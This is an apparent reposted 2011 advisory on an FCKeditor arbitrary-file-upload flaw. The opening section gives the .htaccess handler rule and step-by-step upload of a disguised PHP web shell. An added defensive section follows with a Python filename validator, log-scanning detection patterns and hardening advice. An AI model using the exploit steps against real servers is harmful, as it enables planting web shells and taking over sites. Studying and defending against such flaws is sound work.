FCKeditor upload vulnerability (all PHP versions)
Author: anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is automatically changed to "shell_php.gif".
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available from the server.
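From the defender's side, the steps above chain two weaknesses: the upload connector accepts a dotfile (.htaccess), and the rename of shell.php.gif to shell_php.gif leaves "php" in the stored name, which the uploaded .htaccess then maps back to the PHP handler. The following Python example is added here and is not part of the original advisory or of FCKeditor. It shows a strict upload-name policy that rejects both files, and a small scan over constructed access-log lines that flags the two indicators a responder would look for: a request for an .htaccess inside the web root and a request for a *_php.gif file. The function names, the log format and the sample lines are assumptions made for this illustration.

```python
import re
from typing import List, Tuple

# Extension allow-list for an image upload directory (assumption for this example).
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}

# Tokens that must never appear anywhere in a stored file name. "php" covers
# shell.php.gif, the renamed shell_php.gif and variants such as .phtml.
FORBIDDEN_TOKENS = ("php", "phtml", "htaccess")


def is_safe_upload_name(name: str) -> Tuple[bool, str]:
    """Return (ok, reason). Accept only a plain base name with exactly one
    allow-listed extension; reject path separators, dotfiles and any name
    carrying a server-side-script token (renaming alone is not enough)."""
    base = name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if base != name:
        return False, "path separator in name"
    if not base or base.startswith("."):
        return False, "empty name or dotfile (e.g. .htaccess)"
    parts = base.lower().split(".")
    if len(parts) != 2:
        return False, "name must have exactly one extension"
    stem, ext = parts
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' not allowed"
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", stem):
        return False, "stem contains characters outside [a-z0-9_-]"
    for tok in FORBIDDEN_TOKENS:
        if tok in stem:
            return False, f"forbidden token '{tok}' in name"
    return True, "ok"


# Constructed Apache combined-format lines for the scan below (not real traffic;
# the connector path is a placeholder, not FCKeditor's actual path).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Oct/2011:07:39:07 +0800] "POST /FCKeditor/connectors/upload?Type=File HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Oct/2011:07:39:20 +0800] "GET /userfiles/file/.htaccess HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Oct/2011:07:40:02 +0800] "GET /userfiles/file/shell_php.gif HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Oct/2011:08:01:11 +0800] "GET /userfiles/image/photo.gif HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Parse client IP, timestamp, method, request path and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Path patterns that should not occur in legitimate traffic to an image upload directory.
INDICATORS = [
    ("htaccess-in-webroot", re.compile(r"/\.ht", re.I)),
    ("renamed-php-disguised-as-image", re.compile(r"_php\.(gif|jpe?g|png)(\?|$)", re.I)),
    ("double-extension-script", re.compile(r"\.php\.[a-z0-9]+(\?|$)", re.I)),
]


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (indicator, client_ip, path) for every request whose path matches an indicator."""
    hits: List[Tuple[str, str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        for label, pattern in INDICATORS:
            if pattern.search(path):
                hits.append((label, m.group("ip"), path))
    return hits


if __name__ == "__main__":
    for candidate in (".htaccess", "shell.php.gif", "shell_php.gif", "photo.gif"):
        print(candidate, "->", is_safe_upload_name(candidate))
    for hit in scan_log(SAMPLE_LOG):
        print("ALERT", *hit)
```

The name policy is the application-side fix; the server-side complement is to serve the upload directory with AllowOverride None and with PHP execution disabled, so that an uploaded .htaccess is inert even if the filter is bypassed.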